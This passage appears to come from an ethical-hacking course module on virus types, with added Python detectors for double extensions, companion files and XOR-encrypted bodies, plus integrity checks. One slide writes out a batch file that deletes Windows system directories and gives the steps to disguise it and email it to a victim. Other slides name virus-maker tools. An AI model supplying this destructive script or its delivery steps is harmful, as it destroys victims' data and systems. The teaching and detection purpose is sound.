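EXECUTABLE_EXTENSIONS = {
    ".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".msi", ".cpl", ".hta",
    ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".ps1", ".lnk", ".jar",
}

# Extensions users read as "just a document or picture".
DOCUMENT_EXTENSIONS = {
    ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".rtf",
    ".jpg", ".jpeg", ".png", ".gif", ".bmp", ".mp3", ".mp4", ".zip",
}


def extensions_of(filename: str) -> list:
    """All dotted extensions in order, lowercased, with padding spaces removed
    (the padded form 'report.txt        .exe' pushes the real extension out of
    a narrow column). 'BAD.TXT.VBS' -> ['.txt', '.vbs']."""
    parts = filename.split(".")
    return ["." + p.strip().lower() for p in parts[1:] if p.strip()]


def displayed_name(filename: str) -> str:
    """What Explorer shows when 'Hide extensions for known file types' is on:
    only the final extension is hidden, so BAD.TXT.VBS appears as BAD.TXT."""
    base, ext = os.path.splitext(filename)
    return base if ext else filename


def is_deceptive(filename: str) -> bool:
    """Deceptive when the real (last) extension is executable and the one
    just before it is a harmless document type."""
    exts = extensions_of(filename)
    if len(exts) < 2:
        return False
    return exts[-1] in EXECUTABLE_EXTENSIONS and exts[-2] in DOCUMENT_EXTENSIONS


def classify_attachments(filenames: list) -> list:
    """Return (real name, name the user would see) for each deceptive file."""
    return [(f, displayed_name(f)) for f in filenames if is_deceptive(f)]


# Constructed sample attachment names, not taken from any real mailbox.
SAMPLE_ATTACHMENTS = [
    "BAD.TXT.VBS",
    "invoice.pdf.exe",
    "photo.jpg                .scr",
    "archive.tar.gz",   # two extensions, neither executable: fine
    "notes.txt",
    "setup.exe",        # openly executable, not disguised
]

if __name__ == "__main__":
    for real, shown in classify_attachments(SAMPLE_ATTACHMENTS):
        print(f"user sees {shown!r}, actual file is {real!r}")
```

    The check deliberately does not flag a plain `setup.exe`: the risk the slide describes is the mismatch between what the user sees and what will run, so a visible executable is a separate policy question.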
• 33. System or Boot Sector Viruses

Boot sector virus: a boot sector virus moves the MBR to another location on the hard disk and copies itself to the original location of the MBR. Execution: when the system boots, the virus code is executed first and then control is passed to the original MBR. (Figure labels: Before Infection; After Infection; Virus Code; MBR.)

System sector viruses can be defined as those that affect the executable code of the disk, as distinct from the boot sector virus that affects the DOS boot sector of the disk. Any system disk is divided into areas, called sectors, where programs are stored. The two types of system sectors are:

MBR (Master Boot Record): MBRs are the most virus-prone zones, because if the MBR is corrupted, all data will be lost.

DBR (DOS Boot Record): The DOS boot sector is executed whenever the system is booted. This is the crucial point of attack for viruses.

The system sector consists of 512 bytes of memory. Because of this, system sector viruses conceal their code in some other disk space. The main carrier of system sector viruses is the floppy disk. These viruses generally reside in memory. They can also be introduced by Trojans. Some sector viruses also spread through infected files, and these are called multipart (multipartite) viruses.
• 34. Virus Removal

System sector viruses are designed to create the illusion that there is no virus on the system. One way to deal with this virus is to avoid the use of the Windows operating system and switch to Linux or Mac, because Windows is more prone to these attacks; Linux and Macintosh have a built-in safeguard to protect against these viruses. The other way is to carry out antivirus checks on a periodic basis.

FIGURE 7.6: System or Boot Sector Viruses (figure labels: Before Infection; After Infection; Virus Code)
• 35. File and Multipartite Viruses

File Viruses

File viruses infect files that are executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be either direct-action (non-resident) or memory-resident. Overwriting viruses cause irreversible damage to the files. These viruses mainly target a range of operating systems that include Windows, UNIX, DOS, and Macintosh.

Characterizing File Viruses

File viruses are mainly characterized and described based on their physical behavior or characteristics. One way to classify a file virus is by the type of file it targets, such as EXE or COM files, the boot sector, etc. A file virus can also be characterized based on how it infects the targeted file (also known as the host file):

Prepending: writes itself into the beginning of the host file's code
Appending: writes itself to the end of the host file
Overwriting: overwrites the host file's code with its own code
Inserting: inserts itself into gaps inside the host file's code
• 36. Companion: renames the original file and writes itself under the host file's name
Cavity infector: writes itself between the file sections of a 32-bit file

File viruses are also classified based on whether they are non-memory-resident or memory-resident. Non-memory-resident viruses search for EXE files on a hard drive and then infect them, whereas memory-resident viruses stay active in memory and trap one or more system functions.

File viruses are said to be polymorphic, encrypted, or non-encrypted. A polymorphic or encrypted virus contains one or more decryptors and a main code. The main virus code is decrypted by the decryptor before it starts. An encrypted virus usually uses variable- or fixed-key decryptors, whereas polymorphic viruses have decryptors that are randomly generated from processor instructions and that consist of many commands that are not used in the decryption process.
Execution of Payload:

Time bomb: after a specified period of time
Direct action: immediately upon execution
Condition triggered: only under certain conditions

Multipartite Viruses

A multipartite virus, also known as a multi-part virus, attempts to attack both the boot sector and the executable or program files at the same time. When the virus is attached to the boot sector, it will in turn affect the system files; and when the virus attaches to the files, it will in turn infect the boot sector.

FIGURE 7.7: File and Multipartite Viruses
• 37. Macro Viruses

(Slide figure: Infects Macro Enabled Documents; Attacker; User.)

Microsoft Word or similar applications can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is started or triggered by some other event. Most macro viruses are written using the macro language Visual Basic for Applications (VBA); they infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files. Macro viruses are somewhat less harmful than other types. They are usually spread via email. Pure data files do not allow the spread of viruses, but sometimes the line between a data file and an executable file is easily overlooked by the average user due to the extensive macro languages in some programs.
In most cases, just to make things easy for users, the line between a data file and a program starts to blur only where the default macros are set to run automatically every time the data file is loaded. Virus writers can exploit common programs with macro capability such as Microsoft Word, Excel, and other Office programs. Windows Help files can also contain macro code. In addition, the latest exploited macro code exists in the full version of the Acrobat program that reads and writes PDF files.
• 38. FIGURE 7.8: Macro Viruses (figure labels: Infects Macro Enabled Documents; Attacker; User)
• 39. Cluster Viruses

Cluster viruses modify directory table entries so that they point users or system processes to the virus code instead of the actual program. Virus copy: there is only one copy of the virus on the disk, infecting all the programs in the computer system. Launches itself: it launches first when any program on the computer system is started, and then control is passed to the actual program.

Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program. When a program is run under DOS, DOS first loads and executes the virus code, and then the virus locates the actual program and executes it. Dir-2 is an example of this type of virus.
• 40. Stealth/Tunneling Viruses

These viruses evade antivirus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the antivirus software's request to read a file, so that the request goes to the virus instead of the OS. The virus can then return an uninfected version of the file to the antivirus software, so that the file appears "clean". (Figure: the virus hides the infected TCPIP.SYS and answers "Here you go" with the original TCPIP.SYS.)

Stealth Viruses

These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts while they are running. Requests to perform operations through these service call interrupts are answered by virus code. These viruses return false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code. The stealth virus hides itself from antivirus software by concealing the original size of the file or by temporarily placing a copy of itself on some other drive of the system, thus substituting the uninfected file stored on the hard drive for the infected one.
A stealth virus hides the modifications that it makes. It takes control of the system functions that read files or system sectors and, when another program requests information that has already been modified by the virus, the stealth virus reports the original information to the requesting program instead. This virus also resides in memory. To avoid detection, these viruses always take over system functions and use them to hide their presence.
• 41. One of the carriers of the stealth virus is the rootkit. Installing a rootkit generally results in this virus attack, because rootkits are installed via Trojans and are thus capable of hiding any malware.

Removal:

Always do a cold boot (boot from a write-protected floppy disk or CD)
Never use DOS commands such as FDISK to fix the virus
Use antivirus software

Tunneling Viruses

These viruses trace the steps of interceptor programs that monitor operating system requests, so that they get into the BIOS and DOS to install themselves. To perform this activity, they even tunnel under antivirus software programs.

FIGURE 7.9: Working of Stealth/Tunneling Viruses (figure: Anti-virus Software asks "Give me the system file tcpip.sys to scan"; VIRUS hides the infected TCPIP.SYS and replies "Here you go" with the original TCPIP.SYS)
• 42. Encryption Viruses

This type of virus uses simple encryption to encipher its code. The virus is encrypted with a different key for each infected file. An AV scanner cannot directly detect these types of viruses using signature detection methods. (Figure labels: Virus Code; Encryption Virus 2; Encryption Virus 3.)

This type of virus consists of an encrypted copy of the virus and a decryption module. The decryption module remains constant, whereas different keys are used for encryption. These viruses generally XOR each byte with a randomized key.

The virus is enciphered with an encryption key; the infected file carries a decryption module and an encrypted copy of the code.
For each infected file, the virus is encrypted using a different combination of keys, but the decryption module remains unchanged. It is not possible for the virus scanner to detect the virus body directly by means of signatures, but the decryption module can be detected.
The decryption technique employed is to XOR each byte with a randomized key that is generated and saved by the root virus.
• 43. FIGURE 7.10: Working of Encryption Viruses (figure labels: Virus Code; Encryption Virus 1; Encryption Virus 2; Encryption Virus 3)
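The per-file XOR key and constant decryption module described above, as an added example that is not code from the module: it shows why a signature on the virus body misses every sample but a signature on the unchanging decryptor hits all of them, and why a single-byte XOR is cheap for a scanner to see through by trying all 256 keys. The stub, body and signatures are constructed stand-in byte strings.

```python
"""Added example (not from the CEH module).  Every byte string here is a
constructed placeholder; nothing is or runs malware.  The layout of one
'infected file' is: constant decryptor stub | saved key byte | body XORed
with that key, which is the scheme the module text describes."""

# Constructed stand-ins.  In a real sample the stub would be machine code
# that reads the saved key and XORs the body before jumping into it.
DECRYPTOR_STUB = b"[stub:xor-each-byte-with-saved-key]"
VIRUS_BODY = b"[constructed-virus-body-placeholder-0123456789]"

# Signatures an AV engine might carry (assumed for the example).
BODY_SIGNATURE = VIRUS_BODY[:16]   # a slice of the plaintext body
STUB_SIGNATURE = DECRYPTOR_STUB    # the part that never changes


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; applying it twice restores data."""
    return bytes(b ^ key for b in data)


def build_sample(key: int) -> bytes:
    """Lay out one 'infected file' image for the given single-byte key."""
    if not 0 <= key <= 0xFF:
        raise ValueError("single-byte key expected")
    return DECRYPTOR_STUB + bytes([key]) + xor_bytes(VIRUS_BODY, key)


def recover_body(sample: bytes) -> bytes:
    """What the stub does at run time: fetch the saved key, decrypt the body."""
    off = len(DECRYPTOR_STUB)
    return xor_bytes(sample[off + 1:], sample[off])


def naive_scan(sample: bytes) -> dict:
    """Plain substring signatures, the method the slide says fails on the
    body.  The stub signature still works because the stub is constant."""
    return {"body_hit": BODY_SIGNATURE in sample,
            "stub_hit": STUB_SIGNATURE in sample}


def xor_aware_scan(sample: bytes, signature: bytes = BODY_SIGNATURE):
    """Scanner countermeasure: a single-byte key has only 256 values, so try
    each one on the bytes after the stub and look for the body signature.
    Returns the key that exposed it, or None."""
    tail = sample[len(DECRYPTOR_STUB) + 1:]
    for key in range(256):
        if signature in xor_bytes(tail, key):
            return key
    return None


def demo(keys=(0x5A, 0x3C, 0x00)) -> list:
    """Three samples with different keys.  Key 0x00 is the degenerate case:
    the 'encrypted' body is plaintext and even the body signature fires."""
    rows = []
    for key in keys:
        s = build_sample(key)
        rows.append({"key": key, **naive_scan(s),
                     "xor_aware_key": xor_aware_scan(s),
                     "body_restored": recover_body(s) == VIRUS_BODY})
    return rows


if __name__ == "__main__":
    for row in demo():
        print(row)
```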
• 44. Polymorphic Code

Polymorphic code is code that mutates while keeping the original algorithm intact. To enable polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or mutation engine). A well-written polymorphic virus therefore has no parts that stay the same on each infection. (Figure labels: Encrypted Mutation Engine; Encrypted Virus Code; Decryptor Routine; the decryptor routine decrypts the virus code and mutation engine; New Polymorphic Virus; User Runs an Infected Program; RAM.)

Polymorphic viruses modify their code for each replication in order to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. A random number generator is used for implementing polymorphism. A mutation engine is generally used to enable polymorphic code. The mutator provides a sequence of instructions that a virus scanner can use to optimize an appropriate detection algorithm. Slow polymorphic codes are used to prevent antivirus professionals from accessing the codes: virus samples taken from bait files after a single execution contain a similar copy of the virus. A simple integrity checker is used to detect the presence of a polymorphic virus on the system's disk.
• 45. FIGURE 7.11: How Polymorphic Code Works (figure: Encrypted Mutation Engine (EME); Encrypted Virus Code; Decryptor Routine; the decryptor routine decrypts the virus code and mutation engine; New Polymorphic Virus; Virus Does the Damage; User Runs an Infected Program; RAM)

Polymorphic viruses consist of three components: the encrypted virus code, the decryptor routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus code. It decrypts the code only after taking control of the computer. The mutation engine generates randomized decryption routines; this decryption routine varies every time a new program is infected by the virus. With a polymorphic virus, both the mutation engine and the virus code are encrypted. When a program that is infected with a polymorphic virus is run by the user, the decryptor routine takes complete control of the system, after which it decrypts the virus code and the mutation engine. Next, control of the system is transferred by the decryption routine to the virus, which locates a new program to infect. In RAM (random access memory), the virus makes a replica of itself as well as of the mutation engine.
Then the virus instructs the mutation engine to generate a new randomized decryption routine capable of decrypting the virus. This new copy of both the virus code and the mutation engine is then encrypted by the virus. Thus the virus, along with the newly encrypted virus code and encrypted mutation engine (EME), appends the new decryption routine onto a new program, thereby continuing the process. Polymorphic viruses spread by the attacker in targeted systems are difficult to detect because the virus body is encrypted and the decryption routine changes from infection to infection, so no two infections look the same; this makes it difficult for the virus scanner to identify the virus.
• 46. Metamorphic Viruses

Metamorphic viruses rewrite themselves completely each time they infect a new executable. Metamorphic code can reprogram itself by translating its own code into a temporary representation and then back to the normal code again. For example, W32/Simile consisted of over 14,000 lines of assembly code, 90% of it part of the metamorphic engine. (Figure: screenshots of the MetaPHOR variants, reproduced as Figure 7.12.)

Some viruses rewrite themselves to infect newly executed files. Such viruses are complex and use metamorphic engines for execution. Code that can reprogram itself is called metamorphic code. This code is translated into a temporary form and then converted back to normal code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. It is more effective than polymorphic code. This type of virus consists of complex, extensive code.
The commonly known metamorphic viruses are:

Win32/Simile: This virus is written in assembly language and targets Microsoft Windows. The process is complex, and nearly 90% of the virus code is generated by this process.

Zmist: Zmist, also known as Zombie.Mistfall, is the first virus to use the technique called "code integration." This code inserts itself into other code, regenerates the code, and rebuilds the executable.
• 47. FIGURE 7.12: Metamorphic Viruses Screenshot (panels: a.) Variant A; b.) Variant B; c.) The "Unofficial" Variant C; d.) The .D variant, which was the "official" C of the original author)
• 48. File Overwriting or Cavity Viruses

A cavity virus overwrites a part of the host file that is filled with a constant (usually nulls), without increasing the length of the file and while preserving its functionality. (Figure: a document whose run of null padding is overwritten; Original File Size: 45 KB; Infected File Size: 45 KB.)

These are also known as space-fillers, since they maintain a constant file size while infecting by installing themselves into the target program. They append themselves to the end of files and also corrupt the start of files. When the file is run, this first activates and executes the virus code, and later the original application program. Some program files have areas of empty space. This empty space is the main target of these viruses. The cavity virus, also known as the space filler virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction to the original code. It installs itself in the file it attempts to infect.
This type of virus is rarely used because it is difficult to write. The newer Windows file format called the Portable Executable is designed for fast loading of programs. However, it leaves a certain gap in the file while it is being executed that can be used by the space filler virus to insert itself. The most popular virus family of this kind is the CIH virus.

FIGURE 7.13: File Overwriting or Cavity Virus (figure: a PDF before and after infection; Original File Size: 45 KB; Infected File Size: 45 KB)
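The "simple integrity checker" named under Polymorphic Code and the constant-file-size behaviour of cavity viruses described above, as an added example that is not code from the module: it baselines size and SHA-256 for every file under a directory, then classifies later differences, so that a same-size content change (the cavity case) is caught even though a size check alone would miss it. The files and both "infections" are constructed byte edits in a temporary folder; nothing is executed.

```python
"""Added example (not from the CEH module): a minimal integrity checker.
A size-only check catches an add-on infection (the file grows) but not a
cavity infection (bytes change, size does not); hashing catches both."""
import hashlib
import tempfile
from pathlib import Path


def fingerprint(path: Path) -> dict:
    data = path.read_bytes()
    return {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}


def baseline(root: Path) -> dict:
    """Record size and hash of every regular file under root."""
    return {p.relative_to(root).as_posix(): fingerprint(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def check(root: Path, base: dict) -> dict:
    """Compare the tree against the baseline.  'same-size-modified' is the
    verdict a size-only check would never produce."""
    now = baseline(root)
    verdicts = {}
    for name in sorted(set(base) | set(now)):
        if name not in now:
            verdicts[name] = "missing"
        elif name not in base:
            verdicts[name] = "new"
        elif now[name] == base[name]:
            verdicts[name] = "ok"
        elif now[name]["size"] != base[name]["size"]:
            verdicts[name] = "size-changed"
        else:
            verdicts[name] = "same-size-modified"
    return verdicts


# --- constructed stand-ins for the two infection styles ---------------------

def overwrite_slack(path: Path, marker: bytes) -> None:
    """Cavity-style edit: write marker over the first run of zero padding
    long enough to hold it, so the file length is unchanged."""
    data = bytearray(path.read_bytes())
    pad = data.find(b"\x00" * len(marker))
    if pad < 0:
        raise ValueError("no padding large enough for the marker")
    data[pad:pad + len(marker)] = marker
    path.write_bytes(bytes(data))


def append_marker(path: Path, marker: bytes) -> None:
    """Add-on style edit: the file simply grows."""
    with path.open("ab") as f:
        f.write(marker)


def demo() -> dict:
    """Baseline three constructed 'programs', alter two, re-check."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        # Constructed image with 64 bytes of zero padding (slack) inside.
        padded = b"MZ" + b"\x90" * 48 + b"\x00" * 64 + b"END"
        for name in ("a.exe", "b.exe", "c.exe"):
            (root / name).write_bytes(padded)
        base = baseline(root)
        overwrite_slack(root / "a.exe", b"CAVITY-MARKER")   # size unchanged
        append_marker(root / "b.exe", b"ADDON-MARKER")      # size grows
        return check(root, base)


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

Run from inside the infected OS, a checker like this reads through whatever a stealth virus chooses to return for file reads, which is why the module's cold-boot advice applies before trusting its verdicts.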
• 49. Sparse Infector Viruses

Sparse infector viruses infect only occasionally (e.g., every tenth program executed, or on a particular day of the week) or only files whose lengths fall within a narrow range. Difficult to detect: by infecting less often, these viruses try to minimize the probability of being discovered.

FIGURE 7.14: Working of Sparse Infector Viruses (figure: infection process: wake up on the 15th of every month and execute code)
• 50. Companion/Camouflage Viruses

A companion virus creates a companion file for each executable file the virus infects. Therefore, a companion virus may save itself as notepad.com, and every time a user executes notepad.exe (the good program), the computer will load notepad.com (the virus) and infect the system. (Figure: the virus infects the system with a file notepad.com saved in the c:\winnt\system32 directory; Attacker; Notepad.exe; Notepad.com.)

Companion Viruses

The companion virus stores itself under the same file name as the targeted program file. As soon as that file is executed, the virus infects the computer, and hard disk data is modified. Companion viruses rely on DOS running COM files before EXE files of the same name: the virus installs an identically named COM file and thereby infects the EXE files.

Source: http://www.cknow.com/vtutor/CompanionViruses.html

Here is what happens: Suppose a companion virus is executing on your PC and decides it is time to infect a file. It looks around and happens to find a file called PGM.EXE. It now creates a file called PGM.COM, containing the virus. The virus usually plants this file in the same directory as the .EXE file, but it could place it in any directory on your DOS path. If you type PGM and press Enter, DOS executes PGM.COM instead of PGM.EXE.
(In o r d e r , DOS w ill e x e c u te C O M , t h e n EXE, a n d t h e n BAT file s o f t h e s a m e r o o t n a m e , if t h e y a re all in t h e s a m e d ir e c t o r y . ) T h e v iru s e x e c u te s , p o s s ib ly i n f e c t i n g m o r e file s , a n d t h e n lo a d s a n d e x e c u te s PGM.EXE. T h e u ser p r o b a b l y w o u l d fa il t o n o t i c e a n y t h i n g is w r o n g . It is easy t o d e t e c t a c o m p a n i o n v i r u s j u s t by t h e p r e s e n c e o f t h e e x tr a C O M f ile in t h e s y s te m . M odule 07 Page 1055 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
• 51. Virus infects the system with a file notepad.com and saves it in the c:\winnt\system32 directory (Attacker -> Notepad.exe / Notepad.com)
FIGURE 7.15: Working of Companion/Camouflage Viruses
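The detection point above (the extra COM file is the tell-tale sign, because DOS resolves a bare command name as COM, then EXE, then BAT) can be turned into a small audit. The following is an added example, not code from the EC-Council module or the cknow.com source; the directory listing it checks is constructed sample data, and `audit_tree` is a hypothetical wrapper for running the same check over a real tree.

```python
"""Companion-file audit (added example; not from the EC-Council module).

DOS resolved a command typed without an extension by trying NAME.COM, then
NAME.EXE, then NAME.BAT in each directory on the path.  A companion virus
abuses that order by dropping PGM.COM beside a legitimate PGM.EXE, so the
extra COM file is itself the symptom.  Sample listings below are constructed.
"""
from __future__ import annotations

import os

# Resolution order DOS used for a command typed without an extension.
DOS_SEARCH_ORDER = (".com", ".exe", ".bat")


def resolve_dos_command(name: str, listing: list[str]) -> str | None:
    """Return the file DOS would run for `name` given one directory listing.

    Matching is case-insensitive, as on DOS; the first hit in
    COM > EXE > BAT order wins, or None when nothing matches.
    """
    lowered = {f.lower(): f for f in listing}
    for ext in DOS_SEARCH_ORDER:
        candidate = name.lower() + ext
        if candidate in lowered:
            return lowered[candidate]
    return None


def find_companion_pairs(listing: list[str]) -> list[tuple[str, str]]:
    """Return (shadowing_file, shadowed_file) pairs found in one listing.

    A pair is reported whenever a file would be chosen over another file of
    the same root name with a lower-priority extension (PGM.COM over
    PGM.EXE).  Legitimate pairs exist, so this is a triage list, not a verdict.
    """
    by_root: dict = {}
    for fname in listing:
        root, ext = os.path.splitext(fname)
        if ext.lower() in DOS_SEARCH_ORDER:
            by_root.setdefault(root.lower(), {})[ext.lower()] = fname
    pairs = []
    for exts in by_root.values():
        if len(exts) < 2:
            continue
        # The winner is the highest-priority extension that is present.
        winner = next(exts[e] for e in DOS_SEARCH_ORDER if e in exts)
        for e in DOS_SEARCH_ORDER:
            if e in exts and exts[e] != winner:
                pairs.append((winner, exts[e]))
    return sorted(pairs)


def audit_tree(root_dir: str) -> dict:
    """Hypothetical wrapper: walk a real tree and collect pairs per directory."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root_dir):
        pairs = find_companion_pairs(files)
        if pairs:
            findings[dirpath] = pairs
    return findings


if __name__ == "__main__":
    # Constructed listing of a system directory after a companion infection.
    sample = ["NOTEPAD.EXE", "notepad.com", "CALC.EXE", "PGM.EXE", "PGM.COM", "README.TXT"]
    print("typing NOTEPAD runs:", resolve_dos_command("notepad", sample))
    for shadowing, shadowed in find_companion_pairs(sample):
        print(f"suspicious: {shadowing} shadows {shadowed}")
```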
• 52. Shell Viruses
- Virus code forms a shell around the target host program's code, making itself the original program and the host code its sub-routine
- Almost all boot program viruses are shell viruses
- Before infection: Original Program. After infection: Virus Code -> Original Program
A shell virus's code forms a layer around the target host program's code that can be compared to an "eggshell," making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code, and the virus assumes its identity.
FIGURE 7.16: Working of Shell Viruses
• 53. File Extension Viruses
- File extension viruses change the extensions of files
- .TXT is safe as it indicates a pure text file
- With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT
- If you have forgotten that extensions are turned off, you might think this is a text file and open it
- This is an executable Visual Basic Script virus file and could do serious damage
- The countermeasure is to turn off "Hide file extensions" in Windows
Source: http://www.cknow.com/vtutor/FileExtensions.html
The countermeasure is to turn off "Hide file extensions" in Windows, as shown in the following screenshot:
• 54. [Screenshot: Folder Options > View > Advanced settings, with "Hide extensions for known file types" unchecked]
FIGURE 7.17: Uncheck Hide File Extensions
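The display rule behind BAD.TXT.VBS appearing as BAD.TXT (only the last, registered extension is hidden) can be modelled and used to flag deceptive attachment names. This is an added example, not code from the module or the cknow.com source; the executable and document extension sets are a constructed subset, not read from the Windows registry.

```python
"""Double-extension audit (added example; not from the EC-Council module).

With "Hide extensions for known file types" enabled, Explorer strips only the
final, registered extension, so BAD.TXT.VBS is shown as BAD.TXT.  The functions
below model that rule and flag names whose visible part ends in a document
extension while the real extension is executable.
"""
from __future__ import annotations

import os

# Extensions Windows runs or interprets as code (constructed subset).
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse",
                   ".wsf", ".wsh", ".scr", ".pif", ".hta", ".ps1", ".msi"}
# Extensions a user reads as "just a document" (constructed subset).
DOCUMENT_EXTS = {".txt", ".doc", ".docx", ".pdf", ".jpg", ".png", ".xls", ".xlsx"}


def displayed_name(filename: str, hide_known_extensions: bool = True) -> str:
    """Return the name Explorer shows for `filename` under the given setting.

    Only the last extension is hidden, and only when it is a "known" type;
    in this model, known means a member of either extension set above.
    """
    if not hide_known_extensions:
        return filename
    root, ext = os.path.splitext(filename)
    if ext.lower() in EXECUTABLE_EXTS | DOCUMENT_EXTS:
        return root
    return filename


def is_deceptive(filename: str) -> bool:
    """True when the visible part ends in a document extension but the real
    (last) extension is executable, e.g. BAD.TXT.VBS displayed as BAD.TXT."""
    root, real_ext = os.path.splitext(filename)
    if real_ext.lower() not in EXECUTABLE_EXTS:
        return False
    _, shown_ext = os.path.splitext(root)
    return shown_ext.lower() in DOCUMENT_EXTS


def triage(filenames: list[str]) -> dict[str, str]:
    """Map each deceptive filename to the name a user would have seen."""
    return {f: displayed_name(f) for f in filenames if is_deceptive(f)}


if __name__ == "__main__":
    # Constructed attachment names for the demonstration.
    inbox = ["BAD.TXT.VBS", "report.pdf.exe", "notes.txt", "setup.exe", "photo.jpg.scr"]
    for real, shown in triage(inbox).items():
        print(f"{shown!r} is really {real!r}")
```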
• 55. Add-on and Intrusive Viruses
Add-on Viruses
- Add-on viruses append their code to the host code without making any changes to the latter, or relocate the host code to insert their own code at the beginning
- Diagram: Original Program -> (JUMP) -> viral code -> Original Program
Most viruses are add-on viruses. This type of virus adds its code at the beginning of the host code without making any changes to the latter. Thus, the virus corrupts the startup information of the host code and places itself there, but it does not touch the host code itself; the virus code is, however, executed before the host code. The only indication that the file is corrupted is that the size of the file has increased.
FIGURE 7.18: Working of Add-on Viruses
• 56. Intrusive Viruses
Intrusive viruses overwrite the target host's program code with their own code, either removing the host's code completely or sometimes overwriting only part of it. Therefore, the original code is not executed properly.
FIGURE 7.19: Working of Intrusive Viruses
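The three infection styles just described (shell and add-on viruses leave the host code intact and make the file larger; intrusive viruses overwrite it in place) can be told apart with a size-plus-hash integrity baseline. The following is an added example, not code from the EC-Council module; file contents are modelled as in-memory byte strings (constructed sample data) so it runs offline, and the verdict names are the example's own.

```python
"""Integrity baseline that tells add-on, shell and intrusive infections apart
(added example; not code from the EC-Council module).

An add-on or shell virus keeps the host code and grows the file; an intrusive
virus overwrites part of the host in place.  Recording (size, sha256) while the
system is known clean lets a later comparison separate those cases.  File
contents are in-memory byte strings here (constructed sample data); on a real
host the dictionaries would be filled from disk.
"""
from __future__ import annotations

import hashlib
from typing import Dict, Optional, Tuple

Baseline = Dict[str, Tuple[int, str]]  # name -> (size, sha256 hex)


def _digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files: Dict[str, bytes]) -> Baseline:
    """Record (size, sha256) for every file while the system is known clean."""
    return {name: (len(data), _digest(data)) for name, data in files.items()}


def classify(baseline: Baseline, current: Dict[str, bytes],
             originals: Optional[Dict[str, bytes]] = None) -> Dict[str, str]:
    """Compare current contents against the baseline; one verdict per name.

      unchanged      size and hash match the baseline
      grown-wrapped  larger, and the clean bytes still appear contiguously
                     inside the file (add-on or shell style: host preserved)
      grown          larger, but the clean bytes are no longer intact
      overwritten    same size, different hash (intrusive style)
      shrunk         smaller than the baseline
      new / missing  present on only one side

    `originals` (the clean bytes) is needed for the wrapped test; without it,
    any growth is reported as plain "grown".
    """
    verdicts: Dict[str, str] = {}
    for name in sorted(set(baseline) | set(current)):
        if name not in baseline:
            verdicts[name] = "new"
            continue
        if name not in current:
            verdicts[name] = "missing"
            continue
        size, digest = baseline[name]
        data = current[name]
        if len(data) == size and _digest(data) == digest:
            verdicts[name] = "unchanged"
        elif len(data) == size:
            verdicts[name] = "overwritten"
        elif len(data) < size:
            verdicts[name] = "shrunk"
        elif originals and name in originals and originals[name] in data:
            verdicts[name] = "grown-wrapped"
        else:
            verdicts[name] = "grown"
    return verdicts


if __name__ == "__main__":
    # Constructed clean state and the infection styles from the text.
    clean = {"pgm.exe": b"HOST:entry;body;exit", "calc.exe": b"CALC:main;"}
    base = build_baseline(clean)
    after = {
        "pgm.exe": b"VIRUS:jump-to-host;" + clean["pgm.exe"],  # add-on: host intact, file larger
        "calc.exe": b"VIRUS:main",                              # intrusive: overwritten in place
        "game.com": b"VIRUS:companion",                         # file absent from the baseline
    }
    for name, verdict in classify(base, after, clean).items():
        print(f"{name}: {verdict}")
```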
• 57. Transient and Terminate and Stay Resident Viruses
Basic Infection Techniques
- Direct Action or Transient Virus: transfers the controls of the host code to where it resides; selects the target program to be modified and corrupts it
- Terminate and Stay Resident Virus (TSR): remains permanently in memory during the entire work session, even after the target host's program is executed and terminated; can be removed only by rebooting
Transient Viruses
Transient viruses transfer all control to the host code where they reside, select the target program to be modified, and corrupt it.
Terminate and Stay Resident Virus (TSR)
TSR viruses remain permanently in memory during the entire work session, even after the target host program is executed and terminated. They can be removed only by rebooting the system.
• 58. Writing a Simple Virus Program
For demonstration purposes, a simple program that can be used to cause harm to a target system is shown here:
1. Create a batch file Game.bat with the following text:
   @echo off
   del c:\winnt\system32\*.*
   del c:\winnt\*.*
2. Convert the Game.bat batch file to Game.com using the bat2com utility
3. Assign an icon to Game.com using the Windows file properties screen
4. Send the Game.com file as an email attachment to a victim
5. When the victim runs this program, it deletes core files in the WINNT directory, making Windows unusable
The victim would have to reinstall Windows, causing problems for already saved files.
• 59. TeraBIT Virus Maker
[Screenshot: TeraBIT Virus Maker option list]
TeraBIT Virus Maker is a virus creation tool whose output is mostly detected by all antivirus software when scanned. The virus mostly doesn't harm the PC, but it can disable the antivirus that is installed on the system for a short time.
• 60. [Screenshot: TeraBIT Virus Maker main window with its option list, file name field, and "Create Virus" button]
FIGURE 7.20: TeraBIT Virus Maker
• 61. JPS Virus Maker and DELmE's Batch Virus Maker
[Screenshots: JPS Virus Maker 3.0 and DELmE's Batch Virus Maker]
JPS Virus Maker
JPS Virus Maker is a tool to create viruses. It also has a feature to convert a virus into a worm and can be used to disable the normal hardware of the system.
• 62. [Screenshot: JPS Virus Maker 3.0 option window]
FIGURE 7.21: JPS Virus Maker Screenshot
DELmE's Batch Virus Maker
